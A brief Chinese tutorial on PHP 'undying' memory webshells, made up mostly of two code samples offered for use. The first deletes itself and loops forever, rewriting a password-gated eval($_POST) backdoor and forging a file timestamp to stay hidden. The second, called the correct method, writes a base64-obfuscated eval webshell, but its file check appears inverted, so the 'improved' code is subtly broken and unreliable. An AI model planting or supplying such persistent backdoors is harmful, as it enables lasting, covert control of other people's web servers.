什么是不死马?
内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。
生成过程 (推荐学习:PHP视频教程)
不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)
网上流传的不死马<?php ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .2.php');
usleep(5000);
}
?>
网上流传的不死马,while里面只是并没有判断了这个文件是不是存在,那么我只需要把这个文件中的shell注释掉就可以绕过你的内存木马了。
正确的姿势应该是这样 :Copy<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'c.php';
$code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+'); while(true) { if(md5(file_get_contents($file))===md5($code)) {
file_put_contents($file, $code);
}
usleep(50);
}?>